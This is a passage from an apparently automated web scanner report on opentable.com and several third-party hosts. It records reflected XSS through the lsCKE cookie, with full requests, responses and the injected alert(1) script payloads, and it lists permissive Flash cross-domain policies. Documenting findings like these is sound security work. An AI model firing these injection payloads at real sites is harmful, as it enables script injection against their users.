Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: jslt=DhNUH7QEwV3LkCIYIt56OZ2ell2dPt4Y; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Vary: Accept-Encoding
Content-Length: 199772


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns
...[SNIP]...
<!--
var s_account="otrestref79263"-alert(1)-"082a2fb7275";
//-->
...[SNIP]...
4.93. http://www.opentable.com/restaurant-search.aspx [lsCKE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /restaurant-search.aspx

Issue detail

The value of the lsCKE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41619"-alert(1)-"a26d3ee11 was submitted in the lsCKE cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /restaurant-search.aspx?startDate=10%2F03%2F2011&ResTime=7%3A00+PM&PartySize=2&PartySizeFake=2+People&RestaurantID=90&rid=90&GeoID=4&txtDateFormat=MM%2Fdd%2Fyyyy&RestaurantReferralID=90 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref41619"-alert(1)-"a26d3ee11; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:55:01 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a01&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2%26d%3d10%252f3%252f2011%2b7%253a00%2bPM%26rtype%3dism_mod&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=100&p1=100&rr1=90&rr2=90; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref41619"-alert(1)-"a26d3ee11&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=yUPXoadxGQxMZ7cdkHO0kg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref41619"-alert(1)-"a26d3ee11&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=yUPXoadxGQxMZ7cdkHO0kg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestref41619"-alert(1)-"a26d3ee11&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=yUPXoadxGQxMZ7cdkHO0kg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=11&vbefreg=11&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref41619"-alert(1)-"a26d3ee11&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=yUPXoadxGQxMZ7cdkHO0kg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=11&vbefreg=11&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=11&vbefreg=11&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref41619"-alert(1)-"a26d3ee11&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=yUPXoadxGQxMZ7cdkHO0kg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref41619"-alert(1)-"a26d3ee11&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=yUPXoadxGQxMZ7cdkHO0kg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref41619"-alert(1)-"a26d3ee11&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=yUPXoadxGQxMZ7cdkHO0kg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46304


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
<!--
var s_account="otrestref41619"-alert(1)-"a26d3ee11";
//-->
...[SNIP]...
4.94. http://www.opentable.com/restaurant-search.aspx [lsCKE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /restaurant-search.aspx

Issue detail

The value of the lsCKE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0e8f"><script>alert(1)</script>b73d6d090c was submitted in the lsCKE cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /restaurant-search.aspx?startDate=10%2F03%2F2011&ResTime=7%3A00+PM&PartySize=2&PartySizeFake=2+People&RestaurantID=90&rid=90&GeoID=4&txtDateFormat=MM%2Fdd%2Fyyyy&RestaurantReferralID=90 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestrefe0e8f"><script>alert(1)</script>b73d6d090c; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:55:00 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a00&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2%26d%3d10%252f3%252f2011%2b7%253a00%2bPM%26rtype%3dism_mod&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=100&p1=100&rr1=90&rr2=90; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefe0e8f"><script>alert(1)</script>b73d6d090c&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=skemQm14LQ9C4cW7t%2fOSWA%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefe0e8f"><script>alert(1)</script>b73d6d090c&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=skemQm14LQ9C4cW7t%2fOSWA%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestrefe0e8f"><script>alert(1)</script>b73d6d090c&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=skemQm14LQ9C4cW7t%2fOSWA%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=7&vbefreg=7&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefe0e8f"><script>alert(1)</script>b73d6d090c&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=skemQm14LQ9C4cW7t%2fOSWA%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=7&vbefreg=7&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=7&vbefreg=7&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefe0e8f"><script>alert(1)</script>b73d6d090c&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=skemQm14LQ9C4cW7t%2fOSWA%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefe0e8f"><script>alert(1)</script>b73d6d090c&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=skemQm14LQ9C4cW7t%2fOSWA%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefe0e8f"><script>alert(1)</script>b73d6d090c&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=skemQm14LQ9C4cW7t%2fOSWA%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46339


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
<img src="http://o.opentable.com/b/ss/otrestrefe0e8f"><script>alert(1)</script>b73d6d090c/1/H.22.1--NS/0" height="1" width="1" border="0" alt="" />
...[SNIP]...
5. Flash cross-domain policy  previous  next
There are 22 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

5.1. http://as00.estara.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as00.estara.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: as00.estara.com

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:54:08 GMT
Server: Apache
Last-Modified: Thu, 14 Jul 2011 10:16:38 GMT
Accept-Ranges: bytes
Content-Length: 567
Cache-Control: max-age=2592000
Expires: Wed, 02 Nov 2011 12:54:08 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!-- http://as00.estara.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.estara.com" />
<allow-access-from domain="*.sh01.de" />
<allow-access-from domain="*.dwsgo.de" />
<allow-access-from domain="*.sosbonnesexcuses.com" />
<allow-access-from domain="*.lagencesecrete.com" />
<allow-access-from domain="*.livefeeds.gr" />
<allow-access-from domain="*.paeiopaliosoxronos.gr" />
<allow-access-from domain="*.kokkinostypos.gr" />
<allow-access-from domain="*" />
...[SNIP]...
5.2. http://dev.virtualearth.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dev.virtualearth.net

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Sun, 18 Sep 2011 00:40:53 GMT
Accept-Ranges: bytes
ETag: "63203e9f9b75cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:56:15 GMT
Connection: close
Content-Length: 277

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-r
...[SNIP]...
5.3. http://ecn.dev.virtualearth.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.dev.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.dev.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Sun, 18 Sep 2011 00:40:53 GMT
Accept-Ranges: bytes
ETag: "63203e9f9b75cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:52:58 GMT
Content-Length: 277
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-r
...[SNIP]...
5.4. http://ecn.t0.tiles.virtualearth.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t0.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t0.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "8dd9956cd874cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 221277
Date: Mon, 03 Oct 2011 12:56:17 GMT
Last-Modified: Sat, 17 Sep 2011 01:23:37 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...
5.5. http://ecn.t1.tiles.virtualearth.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t1.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t1.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "8dd9956cd874cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 214740
Date: Mon, 03 Oct 2011 12:56:16 GMT
